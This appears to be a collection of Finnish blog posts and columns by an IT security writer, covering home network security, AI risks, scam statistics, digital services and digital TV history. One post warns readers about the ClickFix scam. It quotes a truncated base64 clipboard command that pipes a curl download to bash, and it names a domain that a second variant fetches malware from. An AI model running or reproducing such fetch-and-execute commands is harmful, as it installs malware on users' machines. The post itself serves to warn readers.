Kansanedustajien kodeissa avoimet ovet?

Eilen kerrottiin hämmentävä uutinen, että kansanedustajien kodeissa on käyty salaa. Mitään ei ole viety, mutta koteihin on jätetty mahdollisen pelotevaikutuksen vuoksi merkki käynnistä. 

"Poliisi tutkii tunkeutumisia kansanedustajien koteihin."

Saan itsekin soittoja huolestuneilta kansalaisilta, jotka epäilevät puhelimessaan olevan vakoiluohjelma ja että joku käy heidän kotonaan salaa. Tavaroita katoaa tai niitä siirrellään. Todennäköisin selitys on kuitenkin muistisairaus tai alkava mielenterveyshäiriö. 

Toivottavasti kansanedustajien kohdalla kyse ei ole tästä. Silloin asia on vakava, monellakin tavalla. Uutisen mukaan tapauksia on ollut "alle 20", joten määrä on merkittävä eikä enää selity yksittäisen edustajan unohduksella tai pitkäksi venähtäneellä yöllisellä "edustuksella".

Taas kerran voimme vain spekuloida, kun emme tiedä yksityiskohtia. Joten spekuloidaan sitten: mitä hittoa? Miten on mahdollista, että kansanedustajien kodeissa voidaan käydä kenenkään huomaamatta? Ei murtojälkiä, ei ilmeisesti edes havaintoja naapureilta. Eivätkö kansanedustajat osaa pitää huolta turvallisuudestaan? Mitä yhteistä näillä tapauksilla on - asunnon tyyppi, sijainti, edustajan puoluekanta, ikä, sukupuoli...? Uutisissa puhutaan kodeista, mutta onko kyse kuitenkin vain asunnoista?

Näissä tapauksissa kävijä on halunnut jättää tarkoituksella merkin käynnistään. Sehän tarkoittaa, että kodeissa on voitu käydä aiemminkin kenenkään huomaamatta, lukemassa papereita, kopioimassa muistitikkuja, lisäämässä vakoiluohjelmia it-laitteisiin tai asentamassa salakuuntelulaitteita. Pelottavaa.

Oletettavasti kyse on vain edustajien kaupunkiasunnoista, jotka ovat pieniä ja tarkoitettu lähinnä nukkumiseen. Toivottavasti siellä ei säilytetä arkaluonteista turvallisuus- tai ulkopolitiikkaan liittyvää aineistoa. Vanhojen asuntojen lukot ovat tiirikoitavissa ja porraskäytävään voi livahtaa toisen perässä, mutta ettei kukaan toinen asukas huomaisi mitään? Tämä voisi onnistua muutaman kerran, mutta että näin laajassa mitassa? Entä jos kyse olisi häiriköstä tai vakavammasta?

Jos kyse on tavanomaisista kodeista eri puolilla Suomea, kodeissa pitäisi vähintään olla hälytysjärjestelmä, joka vaatii pin-koodin kun ulko-ovi avataan. Alle sadalla eurolla saa valvontakameroita, joilla omakotitalon pihapiirin kulkijoiden kuvat jäävät pilveen tai kameran omalle muistikortille, ja ilmoittavat kuvan kanssa tapahtuneesta puhelimeen.

Onko mahdollista, ettei edustajien turvallisuuskoulutuksessa ole mainittu asiasta? Tietoturvariskeistä on puhuttu paljonkin, mutta ovatko normaalit kulunvalvonta-asiat unohtuneet?

Asia on yleistettävissä kaikkiin etätyöläisiin. Toimistolla kulunvalvonta ja vartiointi tulevat talon puolesta automaattisesti, kotona niistä joutuu huolehtimaan itse. Yrityksen pitäisi varmistaa, että työntekijät huolehtivat asiasta, eivätkä toimi kuten kansanedustajat. 

Ex-supo Saana Nilsson: "Kaikki kummalliset asiat eivät välttämättä liity Venäjään."

Nykyään on tapana nähdä hybridivaikuttamista joka asiassa, mikä jo itsessään on hybridivaikuttamista. Jos tapaukset ovat todellisia, tämä vaikuttaminen on sieltä pahimmasta päästä ja vaatii suuria muutoksia eduskunnan turvakulttuuriin. 

Ylireagointi tai väärinkäsitykset olisivat äärimmäisen nolo selitys, niin edustajien itsensä kuin koko Suomen maineen kannalta.

Kuka liikkuu verkossasi? (kolumni)

It-alalla on yksi laite, joka on jäänyt jälkeen tekniikan kehityksestä. Sen ominaisuudet tai käytettävyys eivät ole juuri muuttuneet vuosien kuluessa. Kuitenkin laite on tietoturvan kannalta kriittinen.

Suojelupoliisi varoittaa joka vuosi niiden riskeistä. Luultavasti sinullakin on sellainen kotonasi.

Kyse on tietenkin wifi-reitittimestä.

Langaton lähiverkko on hieno keksintö. Sen perustekniikka on pysynyt lähes samana 25 vuoden ajan, mutta aiheuttaa yhä hämmennystä.

Mitä eroa on wlanilla ja wifillä? Ei mitään. Windows käyttää yhä vanhaa eurooppalaista wlan-termiä, vaikka amerikkalaisperäinen wifi on levinnyt kaikkialle muualle.

Reititin, tukiasema, purkki… no, joka tapauksessa se laite kytketään laajakaistaan ethernetillä. Jos kaapeli menee väärään reikään, langalliset yhteydet toimivat, mutta sisäverkko näkyy koko maailmalle. Auts.

Jotta jokainen osaisi kytkeä kaapelin oikein, oikeassa reiässä lukee WAN tai siinä näkyy saturnuksen kuva. Miksei voi lukea selkeästi internet? Mitä muita waneja on olemassa kuin internet? 

Nykyisin operaattorien liittymän mukana toimittamat purkit luovat kaksi numeroilla nimettyä verkkoa, joista toisen nimessä on 5G. Sillä ei tietenkään ole mitään tekemistä 5G:n kanssa.

Kerran asennettu wifi-purkki piilotetaan yleensä kaapin päälle tai komeroon. Hallintasalasana unohtuu, koska sitä tarvitaan niin harvoin ja on opetettu, ettei salasanaa saa kirjoittaa mihinkään.

Poissa silmistä, poissa mielestä. Jos Supon varoitus tuokin asian mieleen, unohtunut hallintasalasana estää ylläpidon. Purkki pitäisi resetoida ja asentaa kokonaan uudelleen, jotta siihen pääsisi käsiksi selaimella. Ei jaksa.

Wifi-tekniikka ei selvästikään sovi kotikäyttäjille. Mutta entä it-ammattilaiset? Moni tekee kotona etätöitä, jolloin purkki liittyy suoraan työpaikan verkkoon. Epäilen, että myös ammattilaisten koti-wifit ovat usein retuperällä.

Jotain positiivista on sentään tapahtunut. Operaattori saattaa etäohjata kotien purkkeja ja uudet laitteet päivittävät itsensä ainakin jonkin aikaa. Kun tuki loppuu, loppuvat päivityksetkin.

Päivitys on tärkeää, sillä omassa valokuidussani purkkiin koputetaan kahdeksan sekunnin välein. Haavoittuvuus tai avoimeksi jäänyt portti voi päästää rosvon sisäverkkoon.

Annan kotitehtävän: tarkista, kuka liikkuu kotisi verkossa. Tunnistatko kaikki verkosta löytyvät laitteet?

Tehtävä on yllättävän vaikea, sillä kun hallintanäyttöön vihdoin pääsee, moni laite näkyy epämääräisellä nimellä tai pelkällä mac-osoitteella. Mobiililaitteet vieläpä vaihtavat osoitetta säännöllisesti, jolloin omakin puhelin näyttää vieraalta.

Verkostani löytyi lähes 30 laitetta, joiden selvittämiseen kului koko päivä. Joidenkin tunnistaminen onnistui vain sammuttamalla laite hetkeksi ja katsomalla, mikä nimi hävisi listalta.

Seuraava tehtävä on vaikeampi: seuraa, miten paljon dataa laitteet siirtävät. Itsellä koko verkon määrä oli kesäaikaan 410 gigatavua kuukaudessa. Varsinkin mobiililaitteiden siirtomäärät voivat yllättää. Laitteet lavertelevat dataa läpi yön, vaikka omistaja nukkuu.

Datasiirron seuranta on muutenkin kiinnostavaa. Esimerkiksi digivaakani ”soittaa kotiin” käytöstä riippumatta kaksi kertaa vuorokaudessa, ehkä kysyen päivitystä tai siirtäen mittaustuloksia.

Jos yhden laitteen datankäyttö yhtäkkiä kasvaa, se on ehkä kaapattu ja valjastettu palvelunestohyökkäykseen.

Miten sitten datamääriä voi seurata? Siinäpä se. Reitittimet näyttävät kytketyt laitteet, mutta harvassa on selkeää lokia ja vielä harvemmassa laite- tai ohjelmakohtaista datalaskuria.

Miksei wifi-aseman kyljessä voisi viisari tai edes merkkivaloja, jotka kuvaisivat dataliikenteen määrää? Dataa tulisi seurata kuten sähkön tai veden kulutusta.

Päivitysten loppumisesta voisi kertoa punaisella ”end of life” vilkkuvalolla. Vaikka käyttöliittymät eivät ole juuri kehittyneet, radiotekniikka on. Nopeus, signaalin kantavuus ja parempi salaus ovat hyviä syitä vaihtaa vanha reititin uuteen.

Mielellään ennen kuin on liian myöhäistä.

Julkaistu Tivi-lehdessä 9/2026

Tekoälyn riskejä ei kannata vähätellä (HS 20.9.2026)

Mitä pitäisi ajatella kemiantehtaasta, joka tuo markkinoille uusia tuotteita ymmärtämättä itse, mitä yhdisteitä niissä on käytetty ja miten ne voivat reagoida? Tai tehtaasta, joka ei valvo päästöjään ja saa tiedon ympäristövahingosta vasta ulkopuolisten havaintojen perusteella?

Luultavasti tehtaiden toiminta keskeytettäisiin välittömästi.

Tuoreet uutiset kertovat, että suuret tekoäly-yritykset toimivat juuri näin. Julkisuudessa vaarailmoitukset kuitataan tekosyiksi tai yritysten omiksi markkinointitempauksiksi.

Tekoälyn arvaamattomuus ei ole tullut kenellekään asioita seuraavalle yllätyksenä. Kielimallit ja agentit toimivat tavalla, jota edes valmistaja itse ei pysty täysin ennakoimaan.

Keli on liukas, mutta kukaan ei halua painaa jarrua pelätessään kilpailijan pääsevän maaliin ensimmäisenä. Moni hyötyy tekoäly- ja datakeskushuumasta taloudellisesti ja vähättelee siksi varoituksia.

Isojen yritysten uusimpia tekoälymalleja pyritään rajoittamaan, mutta lähes vastaavia malleja saa muualtakin, eikä niissä ole turhia estoja. Ennen pitkää valtiot ja rikolliset valjastavat tekoälyn tarkoitukselliseen pahantekoon.

Tekoälyä ei pidä aliarvioida. Jo nyt tekoäly pystyy asioihin, joita vielä pari vuotta sitten pidettiin mahdottomina. 

Ei ole syytä olettaa, että kehitys ainakaan itsestään hidastuisi. Kun tekoälyn kyvykkyys kerran ylittää ihmisen, se pystyy kehittämään itseään ja vain kasvattamaan eroa. Ihminen pystyy hallitsemaan koiraansa, mutta koira ei pysty hallitsemaan omistajaansa.

Tekoälyllä ei ole omaa tahtoa eikä tietoisuutta. Siksi eksistentiaalinen uhka ihmiskunnan tuhoutumisesta tekoälyn vuoksi ei vielä ole hälyttävä.

Suurempi ongelma on yhteiskunnan digiriippuvuus. Tahattomasti tai varomattomuuden vuoksi hallinnasta karannut tekoäly voisi sotkea maksamisen, terveydenhuollon tai liikenteen järjestelmiä vaarallisella tavalla. Niissä on jo nykyisellään riittävästi ongelmia.

Ei kannata tuudittautua ajatukseen, että kriittiset tietojärjestelmät ovat suojassa, koska ne eivät ole netissä. Mikään järjestelmä ei ole täysin itsenäinen.

Kysykää vaikka voimaloihin ja vedenpuhdistuslaitoksiin hyökänneiltä hakkereilta. He tekivät sen jo ennen tekoälyä.

Julkaistu Helsingin Sanomien Mielipide-kirjoituksena 20.9.2026

====

Kommentti 27.9.2026:

Varoituksia tekoälyn riskeistä pidetään ylireagointina tai AI-yhtiöiden ovelana markkinointina. Tähän kallistuu myös yleensä niin varovainen ja IT-jätteihin kriittisesti suhtautuva Yle ("Piilaakson pomojen teknologiakultti").

Itse olen aidosti huolissani tekoälyn frontier-mallien riskeistä. Kaiken tapahtuneen kuittaaminen vain "teknologiakulttina" ja turhana pelotteluna on liian helppo selitys. Sekä vähättelijöillä että varoittajilla on iso taloudellinen intressi. Medialta toivoisi asiallista analyysiä kummastakin näkemyksestä.

Lisäys 2.10.2026:

HS 2.10.2026 Lukijan mielipide: Tekoälyn riskeistä on syytä puhua vakavasti

ClickFix huijaa uhrin asentamaan haittaohjelman

Teknisten suojausten parantuessa rosvot pyrkivät huijaamaan uhria asentamaan haittaohjelman tai antamaan pääsyn pankkitililleen. Traficom varoitti vuosi sitten ClickFix-huijauksista, joissa uhria houkutellaan tekemään toimia pääsyn avaamiseksi.

Olemme tottuneet tekemään erilaisia toimenpiteitä osoittaaksemme, että emme ole robotteja. Kun tällainen huijaus ponnahtaa näytölle, reaktio tulee melkein selkäytimestä.

"Verify you are human"

Hiiren klikkaaminen Cloudflaren ikkunassa tuo näytölle varsinaisen huijauksen:

Vaaralliset komennot Terminaaliin.

Tässä vaiheessa sivu on jo lähettänyt vaaralliset komennot selaimen kautta leikepöydälle. Nyt ne pitäisi vain saada ajettua. Siksi ikkuna neuvoo avamaan Terminal-ikkunan (komentorivin) ja painamaan siellä Ctrl+V.

Kun näin tämän ensi kerran, olin juuri säätämässä Clauden ja Google Chromen yhteiskäyttöä. Se on aiemminkin vaatinut Chromen asetusten vaihtamista, ja toimii silti arvaamattomasti. Oli ihan luonnollista, että taas piti tehdä jotain loitsuja asian korjaamiseksi. Lisäksi kone oli Macbook, jossa tunnetusti ei ole haittaohjelmia (eihän?!).

Kehotus avata Terminaali kuitenkin havahdutti: nyt menee liian pitkälle! Vasta vähän myöhemmin tajusin, että tämähän oli haittaohjelma. Liikkeellä on ainakin kaksi erilaista versiota, toinen pyytää todistamaan ettei ole robotti eikä mainitse Cloudflarea, mutta idea on sama.

Mitä leikepöydältä sitten tulee? Merkkipohjainen teksti (keskeltä leikattu pala pois):

bash <<< $(echo "Y3VybCAtcyAnaHR0cH...RhdGUuc2gnIHwgYmFzaA==" | base64 -d)

Eli base64-koodattu käsky, joka purettuna hakee curl -s komennolla varsinaisen haittaohjelman murretulta palvelimelta ja putkittaa sen lopulta bashille suoritettavaksi. Tässä tapauksessa haittaohjelman haku ei kuitenkaan toiminut, eikä .vip-loppuisesta osoitteesta latautunut mitään. 

Toinen variantti lataa suoraan curl -sfL komennolla linkityksen api-logistics.com sivulle, josta varsinainen haittaohjelma haetaan.

Huijaus näyttää olevan käyttöjärjestelmäkohtainen. Kumpikaan näistä ei aktivoitunut mitenkään Windows-koneella tai älypuhelimella. Huijauksesta kuitenkin on raportoitu myös Windows-versiota, jossa ohjeen hannunvaakuna on korvattu Windows-lipulla.

On hyvä muistaa, että kun kyse on social engineering -tekniikoista, Mac-käyttäjät ovat vähintään yhtä alttiita haittaohjelmille. Ehkä jopa enemmänkin, koska kuvittelevat olevansa turvassa. Ja aina pitäisi jaksaa pysähtyä ja pohtia, mitä onkaan tekemässä, vaikka lupaikkunat ja robottien CAPTCHA-tarkastukset menevätkin ärsyttävyydessään selkäytimeen.

iPhonessa uusi suojaustoiminto pankkihuijauksia vastaan, mutta miten se toimii?

Apple julkaisi iOS 27 -version. Siinä on uusi toiminto Identiteetipetosriskien tunnistus (Impersonation Risk Detection), mutta mitähän se tarkoittaa? Kukaan ei tunnu tietävän. Juuri tämä on ärsyttävää: uusia ominaisuuksia tulee koko ajan ilman että tietäisimme, mitä niiden takana on.

Asetus löytyy kohdasta Tietosuoja ja suojaus. Oletusarvona se on pois päältä. 

"Jaa appikehittäjien kanssa"?

Puhelimen oma selitys on minimaalinen: "Sallii appien pyytää Applen identiteettipetosriskin tunnistukseen käytettäviä signaaleja, joiden avulla voidaan havaita, näkyykö laitteessasi tai tilläsi merkkejä aktiivisesta huijauksesta". Siis mitä?

Selitys ei paljon valaise.

Ilmeisesti kyse on rajapinnasta, jota ainakin pankkisovellukset voivat käyttää varoittavien merkkien tunnistamiseen. Esimerkiksi auki oleva puhelu pankkisovelluksen käytön aikana voisi olla tällainen. Sovellus saa tiedon epäilyttävästä tilanteesta ja voi itse päättää, miten reagoi siihen. 

Kiinnostavasti asetuksessa on pakollinen viive. Asetuksen kytkentä päälle tai pois ei aktivoidu heti, vaan 24 tunnin kuluessa. Näin estetään huijaria neuvomasta, miten asetus otetaan pois häiritsemästä hyvää huijausta. Siinä on suomalaisille pankeille mallia!

OP varoittaa rahansiirrosta puhelun aikana. 

Kuulostaa samalta kuin OP:n sovellus, joka näyttää maksun vahvistusnäkymässä varoituksen, mikäli rahaa yritetään siirtää puhelun aikana. Onko Apple matkinut OP:ta vai toisinpäin? Tämä on helppo ymmärtää, mutta mitä ne muut varoitussignaalit voisivat olla?

Joka tapauksessa on kiinnostavaa nähdä, alkavat suomalaiset pankit tukea asetusta omissa pankkiohjelmissaan. Seuraan tilannetta blogissani. 

Huijaukset alkuvuonna 2026: hyviä ja huonoja uutisia

Finanssialan keskusliitto on julkistanut tilastonsa alkuvuoden nettihuijauksista. Luvut eivät ole täydellisiä, mutta ne ovat vertailukelpoisia edelliseen vuoteen, joten ne kertovat muutoksesta. Alan oma järjestö esittää tilastot omalla tavallaan, tein luvuista vähän omia laskelmia. Uutiset ovat sekä hyviä että huonoja.  

Finanssialan tiedote v. 2026 ensimmäisen puoliskon huijauksista.

Hyvä uutinen on, että viime vuoden vastaavaan aikaan verrattuna huijauksissa menetettyjen rahojen määrä laski 28,3 miljoonaan (-6 %) ja estetyt huijaukset sekä palautetut rahamäärät kasvoivat 31,7 miljoonaan (+13 %). Yhteensä huijauksissa yritettiin liikuttaa siis 60 miljoonaa euroa, mikä on 3,4 % aiempaa enemmän.

Sitten ne huonot uutiset. Huijaustapausten yhteismäärä kasvoi 20 000:een, missä on peräti 47 % kasvua. Torjutut huijaukset + palautukset tapausten kpl-määrä kasvoi 41 %, mutta onnistuneiden 62 %. Tämä on huono juttu: yhä useampi huijausyritys siis onnistui. Kasvua oli tosin vain 3 prosenttiyksikköä.

Kappalemäärän kasvu ei näy tiedotteen grafiikassa, koska onnistuneiden huijausten keskimääräinen menetys laski 8100 eurosta (2025) 4700 euroon (2026). Jotain on siis tehty oikein. 

Erityisen oikein on torjuttu turvatili-huijauksia, joissa menetettiin alkuvuonna kaksi miljoonaa ja torjuttiin 1,9 miljoonaa. Viime vuoden kokonaismäärä oli 38,4 miljoonaa, josta estettiin tai pysäytettiin 23,8 miljoonaa. Elleivät turvatilihuijarit ota rajua loppukiriä näyttää siltä, että turvatileistä tehdyt varoitukset ovat tehonneet. Luultavasti myös poliisin kiinni ottamat soittohuijarit ovat vaikuttaneet tilastoihin tervehdyttävällä tavalla.

Tämä kaikki on tietenkin vain tilastointia, eikä kerro koko totuutta. Luvuista puuttuu jättimäinen 25 miljoonan euron huijaus ja toisaalta mukana on myös yritysten toimitusjohtaja- ja laskutushuijauksia. Niissä rikolliset olivat kevätkaudella täysin niskan päällä (menetetty 4,9 miljoonaa, torjuttu 0,4 miljoonaa).

Em. luvut perustuvat alan omaan tietoon tulleisiin tapauksiin. Poliisin luvut ovat erilaisia eikä kaikkia huijauksia ilmoiteta eteenpäin. Lisäksi laskentatapa herättää kysymyksen siitä, miten torjutut huijaukset lasketaan. Ovatko kaikki tapauksia, joissa uhri on mennyt lankaan, mutta pankki estänyt rahan siirron? 

Joka tapauksessa näyttää siltä, että pankkien omilla torjuntakeinoilla ja valvonnalla on ollut kasvava vaikutus. Huijarien rahat koostuvat yhä pienemmistä puroista, mutta kun kyse on kymmenistä miljoonista euroista, yrittäjiä riittää myös loppuvuodelle.

Ollaan siis tarkkoina!

Kotiverkon salattu elämä

Mitä kotisi wifi-verkossa tapahtuu? Paljonko laitteet lataavat ja lähettävät dataa kaikessa hiljaisuudessa?  Vakoillaanko sinua verkon kautta? Hyviä kysymyksiä kaikki. ETN kysyi keväällä, miten paljon puhelin jakaa öisin dataa käyttäjän nukkuessa. Osa datasiirrosta on päivityksiä, sähköpostin synkronointia ja muuta tarpeellista, mutta joukossa voi olla myös kyseenalaista dataliikennettä. Sen tunnistaminen salattujen yhteyksien sisältä on kuitenkin mahdotonta. 

Aloin selvitellä omieni puhelinteni datasiirtoa. Puhelinten omista asetuksista näkyy, miten paljon kukin sovellus on siirtänyt dataa, mutta ovatko luvut luotettavia? Androidissa ylivoimainen ykkönen oli Googlen Play (1,4 Gt kuukaudessa), sitten tulivat Meta App Manager (428 Mt/kk), Outlook (70 Mt/kk) ja Helsingin Sanomat (73 Mt/kk).

Datasiirron mittaaminen puhelimen ulkopuolelta on hankalaa. Kokeilin tehdä toisesta puhelimesta wifi-tukiaseman ja pakottaa mitattavan puhelimen vain wifi-yhteyksiin. Datamittari näytti öisin siirtyvän 20-50 megatavua, mikä tuntui paljolta.

Kotikäyttöön tarkoitetuissa wifi-reitittimissä ei yleensä ole tilastointia, korkeintaan näytetään hetkittäisen datasiirron nopeus. Vanha Google Home -purkki näytti sentään myös kumulatiiviset tulokset. 

Parhaiten tehtävään sopi Asus-reititin, jossa on Traffic Analyzer -tilastointi. Esimerkiksi vanha iPad Air 2 siirtää dataa vuorokauden ympäri, vaikkei laitetta edes käytetty. Ilmeisesti se peilaa samaan tiliin liitetyn iPhonen liikennettä. Datamäärät ovat kuitenkin pieniä, kuten NTP:n 90 saapunutta tavua.

iPad Air 2:n datasiirto on käynnissä kellon ympäri, vaikkei sitä edes käytetä.

Vanha Nokian Android-puhelin imaisi yli 300 megatavua oltuaan muutaman viikon sammutettuna. Ilmeisesti päivityksiä oli rästissä.

Datapiikki Androidissa kun puhelin käynnistetään pitkän tauon jälkeen.

Withingsin älyvaaka "soittaa kotiin" kahdesti vuorokaudessa, vaikkei sitä edes käytetty. Punnituksia tehtäessä se siirtää lukemat pilvipalveluun, joten silloin dataa siirtyy vähän enemmän.

Withings älyvaaka "soittaa kotiin" 12 tunnin välein, käytettiin sitä tai ei, mutta ei siirrä dataa muualle.

Joissakin tapauksissa dataseuranta paljastaa jopa mittauspalveluita, kuten Samsung S9 kohdalla Taboola.

Käyttäjän olisi hyvä tietää kotiverkon normaali datamäärä esimerkiksi viikoittain ja sen jakauma lähtevän ja saapuvan datan suhteen. Yllättävät piikit voivat kertoa, että jokin verkon laite tai reititin itse on valjastettu osaksi kyberhyökkäystä.

Kirjoitin syyskuun Tivi-lehden kolumnin juuri tästä aiheesta. Laitan sen verkkoon myöhemmin, nyt maksumuurin takana. Juuri tällä hetkellä kotiverkko näyttää kuukausittaisen datasiirron määräksi 288/79 gigatavua, mikä on vähän ja kertoo, ettei taloudessa juuri katsota streaming-palveluita. 

Datasiirto sai tällä viikolla uutta huomiota, kun kansainvälinen media kertoi LG:n televisioiden salakuuntelevan katsojia ja kuvaavan heidän näytöllä näkyvää sisältöä. Tältä osin oman LG-television nettiseuranta on parhaillaan käynnissä ja palaan siihen myöhemmässä kirjoituksessa.

Eikä kyse ole vain LG:n vakoilusta, vaan israelilainen yritys on myös kaapannut älytelkkareita tekoälyn avuksi. 

Lisää digiä? Ei kiitos (kolumni)

Suomalaisia pidetään digimyönteisenä kansana. Yritysten ja viranomaisten kehotuksesta olemme siirtyneet laajasti digikanaviin ja sähköiseen itsepalveluun.

Keväällä myös viranomaisposti muuttui digitaaliseksi. Jatkossa kirjeet tulevat ensisijaisesti Suomi.fi-palveluun.

Yhä vain lisää digiä olisi tulossa, mikäli digisietokyky kykenee ottamaan kaiken vastaan. Se alkaa olla koetuksella itse kullakin.

Digiä tyrkytetään, koska se säästää kustannuksia, mutta hyöty kertyy lähinnä palvelun tuottajalle. Sähköisessä itsepalvelussa käyttäjä tekee työtä, eikä hänen kustannuksiaan huomioida missään.

Toinen myyntiargumentti on asioinnin vapaus. Netissä voi maksaa laskuja tai tilata ruokaa vaikka keskellä yötä. Mutta kuinka moni oikeasti tekee niin?

Ympärivuorokautista asiointia tärkeämpää olisi palvelujen toimivuus ja helppokäyttöisyys. Niissä on yhä parantamisen varaa, vaikka asiaa on harjoiteltu jo kolmenkymmenen vuoden ajan. Logiikka hämmentää kokeneenkin käyttäjän, konekielinen suomennos huvittaa ja epäselvät virheilmoitukset ärsyttävät.

Tekniikat, alustat ja lainsäädäntö muuttuvat nopeammin kuin kehittäjät pysyvät perässä. Esimerkiksi pankit ovat panostaneet valtavasti verkkopalveluihin, mutta käyttökatkot ja häiriöt tuntuvat vain lisääntyvän.

Vibekoodaus alentaa entisestään uusien verkkopalvelujen rakentamisen kynnystä. Määrä ei edelleenkään korvaa laatua eikä nopeus suunnittelun merkitystä.

Varsinainen riesa ovat mobiilisovellukset. Sähköauton lataus, hotellit, lentoliput, pankit, kaupan bonukset, kuntosalit, pysäköinti… kaikki haluavat asentaa oman äpin, perustaa tilin ja keksiä uuden salasanan.

Äpit täyttävät puhelimen muistin ja vaativat jatkuvaa päivittämistä. Jokainen uusi sovellus on potentiaalinen tietoturvariski. Lisäksi ne tekevät puhelimen vaihtamisesta työlästä.

Ei enää yhtään uutta äppiä minun puhelimeeni, kiitos!

Itselleni oli silmiä avaava kokemus soittaa puhelimella Maanmittauslaitokselle. Sain minuutissa vastauksen ja ohjeen asiaan, jonka selvittämiseen olin käyttänyt paljon aikaani Googlessa ja viraston omilla nettisivuilla.

Joskus vanha keino on parempi kuin pussillinen digiä. Iäkkäämmät henkilöt muistavat vielä, miten jokaiseen yritykseen ja virastoon pystyi soittamaan ja sai asiansa hoidettua odottaessa.

Ilmankos iäkkäämmät eivät ole innoissaan digiajan hienouksista.

Aktiiviväestö kestää digiähkyn hammasta purren, mutta heistäkin vain harva pitää puhelimestaan. Moni kokee olevansa älypuhelimen orja ja haluaisi eroon koko vehkeestä. Puhelimen suorittama urkinta ja vakoilu huolestuttavat.

Yllättäen myös nuorten keskuudessa on kasvava uusdigitön ryhmä. He haluavat aitoja, analogisia kokemuksia: LP-levyjä, lautapelejä, jopa paperisia kirjoja parantamaan keskittymistä. Diginatiiveista tulee diginegatiiveja.

Ehkä vanhanaikaiseen puhelinpalveluun ei ole palaamista, ehkä papereita on turha haikailla takaisin. Digi on tullut jäädäkseen.

Toivotaan, että jonain päivänä tekoäly korvaa kaikenkirjavat äpit ja epäloogiset nettipalvelut. Tekemisen vaiva siirtyy ihmiseltä koneelle, jolle se kuuluukin. Asiat hoituvat yksinkertaisesti puhutuilla komennoilla.

Tulevaisuutta odotellessa on oikeus vaatia, että nykyisissä palveluissa huomioidaan myös asiakkaan etu ja hänen toiveitaan kuunnellaan. Digipakosta tulisi pyrkiä digihoukutukseen.

Esimerkiksi Suomi.fi-palveluun on toivottu tekstiviesti-ilmoitusta saapuneesta kirjeestä. Sähköposti hukkuu helposti postilaatikoihin ja filttereihin, tekstiviesti huomataan paremmin.

Pankkien e-laskut ovat näppäriä, mutta moni haluaisi ladata ne pdf-muodossa omalle levylleen arkistointia varten. Ei onnistu, koska teknisesti yksinkertainen asia vaatisi pankilta työtä ja vaivaa.

Jos digitalisaation motiivina ovat vain yksipuoliset kustannussäästöt, lopputulos ei voi olla kehuttava.

Väärillä säästöillä syntyy vain sutta ja digisekundaa – sekä ahdistuneita käyttäjiä. 

Julkaistu Tivi-lehden kolumnina 8/2026.

Lisäys: Digitaalinen itsepalvelu ja äppien tyrannia ärsyttää muitakin: Olisiko jossain vielä palvelu, jota ei tarvitse hoitaa itse? (Yle) 

Lisäys liittyen kommenteissa käytyyn keskusteluun: Nordean e-laskun tietojen vienti pdf-muotoon tuottaa yli neljän megatavun pdf-tiedoston, vaikka sama tulostettuna pdf:ksi on vain 75 kilotavua. 

Tämän pdf-tiedoston koko on yli neljä megatavua (!). 

Silmämääräisesti pdf-tiedostojen välillä ei ole mitään eroa, joten miksi pdf-vienti on kooltaan lähes 100-kertainen? Peruskäyttäjä tuskin kiinnittää huomiota asiaan, tai edes jaksaa arkistoida omia laskuja pdf-muotoon. Itse epäilen, että syynä on oikean alanurkan logo. Pdf-vienti käyttää alkuperäistä isoa logoa, joka on vain skaalattu pienemmäksi, kun taas tulostinajuri osaa pienentää sen oikeasti. Voin olla väärässäkin.

Digi-tv alkoi 25 vuotta sitten, vaikka "Big bang" jäi suutariksi

Pian vietetään suomalaisen televisiotoiminnan 25-vuotista merkkipaalua, jonka lähes kaikki alalla toimivat haluaisivat unohtaa. Antenniverkon digitaaliset tv-lähetykset käynnistyivät Suomessa ensimmäisenä maailmassa 27.8.2001 "isolla pamauksella", jota markkinoitiin näyttävästi. Asialla oli varsinkin Yle, joka otti digiveturin raskaaksi osoittautuneen roolin.

Digilähetysten alku ja tuon ajan odotukset ovat tämän päivän näkökulmasta kiinnostava ajankuva, joskin nyt ne herättävät lähinnä hilpeyttä. Itse olin tuolloin hyvin kriittinen digitalisointiprosessia kohtaan, joten en pidä toteutunutta kehitystä lainkaan yllättävänä.

Taustalla oli 1990-luvulla herännyt pelko satelliittikanavien yleistymisestä. Ne uhkasivat murentaa kotimaista tv-toimintaa, jonka voima kansalaisiin oli mahtava (vain kaksi tv-kanavaa!). Kansalliseen verkkoon haluttiin lisää kanavia ja aloittelevasta internetistä tuttua kaksisuuntaisuutta. Lisäksi haluttiin vapauttaa taajuuksia matkapuhelimille.

Nokia oli maineensa huipulla. Se oli valmistanut televisioita ja satellittien digibokseja. Suomessa päätettiin, että maamme olisi ykkönen myös television digitalisoinnissa, ja Nokialla olisi siinä iso rooli. Ylen toimitusjohtaja Arne Wessberg oli jopa Nokian hallituksessa 2001-2006 (eli juuri matkapuhelinten kulta-aikana).

Kaikki meni kuitenkin pieleen. Kun Big bang tapahtui, markkinoilla ei ollut digitaalisia vastaanottimia, joten pari ensimmäistä vuotta lähetykset menivät harakoille. Yle käynnisti kaksi uutta kanavaa, jotka ajettiin alas muutamaa vuotta myöhemmin. Yle rahoitti alun raskaat kustannukset yhtiöittämällä jakelutekniikkansa Digita Oy:ksi ja myymällä sen ulkomaille. Nokian kiinnostus televisioon lopahti, kun matkapuhelimista tuli valtava bisnes.

Yksi IIR:n monien digi-tv-seminaarien materiaalikansio.

Digi-tv:n lupaukset vuorovaikutteisista mainoksista olivat alun perinkin pöhköjä. Paluukanavaa, jonka yhteys olisi vaatinut, ei ollut. MHP osoittautui kuolleeksi. Kaikkien huomio kiintyi internetiin ja joulukuussa 2003 Suomi sai ensimmäisen laajakaistastrategian, joka pyrki tuomaan koteihin nopean nettiyhteyden. 

TV:n ikkuna tietoyhteiskuntaan oli sulkeutunut. Alkoi alamäki, jonka seuraukset näemme tänäkin päivänä. Uusintoja ja amerikkalaista halpatuotantoa, realityohjelmia.

2000-luvun alussa kävin puhumassa alan seminaareissa ja kritisoin suunnitelmia Hesarin yleisönosastossa. Oli typerää lähteä digitalisoimaan perustarkkuuden televisiota, kun HD-aika oli tulossa. Suomen pieni väestöpohja ei riittänyt maailmanlaajuiseksi edelläkävijäksi. Bugisista digisovittimista, joissa DVB-tekstitykset eivät näkyneet, tuli kansallinen murheenkryyni. 

Erääseen LVM:n alan toimijoille järjestämään tilaisuuteen kutsuin itse itseni ja livahdin sisään estelyistä huolimatta. Nykyisin vähän huvittaa.

Kevään 2001 digi-tv-seminaarin puhujat, mm. Telehallintokeskus, MTV, Ortikon interactive...

